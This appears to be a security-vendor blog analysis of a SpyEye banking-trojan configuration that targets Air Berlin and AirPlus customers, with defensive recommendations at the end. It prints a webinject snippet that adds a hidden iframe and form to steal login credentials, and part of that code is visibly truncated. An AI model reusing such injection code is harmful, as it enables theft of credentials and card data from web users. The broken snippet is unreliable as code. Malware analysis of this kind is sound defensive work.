IBM has uncovered a SpyEye configuration that targets users of two leading European airline travel websites: Air Berlin, the second-largest airline in Germany after Lufthansa, and AirPlus, the global provider of business travel services for companies. SpyEye exploits the user’s machine, not the websites, to carry out this fraud.

Travel Companies Become Trojan Targets

The two companies are far from randomly selected, but are, we believe, carefully chosen for their criminal revenue potential. One site accepts debit card payments, while the other caters to business users.

Air Berlin, now Europe’s sixth-largest airline, not only accepts debit and credit cards, but allows Austrian, Dutch and German citizens to pay by bank direct debit seven days before traveling. That means that criminals targeting an Air Berlin traveler from those countries stand a good chance of obtaining users’ personal details, including date of birth, which users must provide on the airline’s site, as well as their bank account details.

AirPlus, meanwhile, offers a variety of travel services for companies of all sizes on their website, all paid for by business payment cards, which are invariably linked to business bank accounts.

Since corporate accounts tend to carry much higher balances or credit limits than consumer accounts, they have much greater data-harvesting, and therefore revenue, potential for cybercriminals.

Data Harvesting Through HTML Injection

In the case of the Air Berlin attack, SpyEye attempts to harvest confidential user information, including username and password and other data that is entered on the targeted Web page. Since Air Berlin accepts bank debit card payments, the fraud potential is even more elevated.

SpyEye’s injection code captures the information on username and password details:

<WebInjects action="Inject|POST|GET"><Url><![CDATA[*]]></Url><AuxUrl><![CDATA[]]></AuxUrl><WebInject><Before><![CDATA[<body>]]></Before><Data><![CDATA[<iframe name=ifr1 id=ifr1 src="" width=0 height=0 border=none></iframe><form id=form7 name=form7 target=ifr1 method=post action=""><input type="hidden" name="cc" id="cc" /><input type="hidden" name="pas" id="pas" /></form><script>function dosubmit(){'login').value;document.form7.pas.value=document.getElementById('pass').value;document.form7.submit();}</script>]]></Data><After><![CDATA[]]></After></WebInject><WebInject><Before><![CDATA[name="yabLogin" id="yabLogin"]]></Before><Data><![CDATA[ onclick="dosubmit()"]]></Data><After><![CDATA[]]></After></WebInject>

The AirPlus attack methodology, meanwhile, targets users of the Lufthansa Miles & More Visa credit card which offers bonus travel for purchases made using the card.

Similar to the Air Berlin attack, the SpyEye code targets the main login URL of the AirPlus portal:

<mark data-hasqtip="true" class="tempMark"><Url><![CDATA[*]]></Url> <Url><![CDATA[*]]></Url></mark>

In this instance, SpyEye injects code that claims to be an anti-fraud enhancement into the user’s Web browser.

In reality, of course, this is a cleverly disguised attempt to phish user credentials from the unsuspecting customer of the AirPlus Web portal. Those credentials are quite comprehensive and include the card name and number, expiration date, CVV (signature strip) number and, as with the Air Berlin attack, the user’s date of birth.

The harvesting of the user’s date of birth opens up the possibility of identity theft and, we have observed, committing fraud by impersonating the user or using social engineering attack methods.


It is important to understand that cybercrime is now highly organized, with specialization of duties assigned to different members of the criminal hierarchy. That means that the darkware coding gangs behind the variants of SpyEye are now choosing their targets carefully for maximum revenue yield with minimal effort. In addition, by enhancing the fraudulent data yield from each victim, the possibilities for resale of data go way beyond that of the carder forums seen in the last few years.

We believe that the cybercriminal gang(s) behind the attacks are almost certainly using a semi-automated methodology of code development, allowing them to develop customized versions of the malware for specific purposes.

Clearly, the travel trade offers cybercriminals access to user and company account credentials with larger-than-normal account balances and credit card limits. Gaining access to Air Berlin bank account details in Austria, Germany and the Netherlands is an indication of targeting ingenuity.

Unfortunately, traditional antivirus security mechanisms are largely unable to protect corporate users from SpyEye infections because the malware uses targeted reconnaissance combined with signature-detection evasion techniques to get a foothold inside computers.

A better alternative for protecting Web-based services from becoming Trojan targets is to implement secure Web access. For example, browser-based tools that secure communication between the computer and cloud service provider website can prevent common attack methods like HTML injection and keylogging from grabbing data. Those same technologies can protect other browser-based applications, such as VPNs, CRM, retail, financial and collaboration systems that malware can exploit to steal user credentials and breach an enterprise’s security perimeter completely undetected.

We expect to see more specialized versions of SpyEye shortly.

more from Malware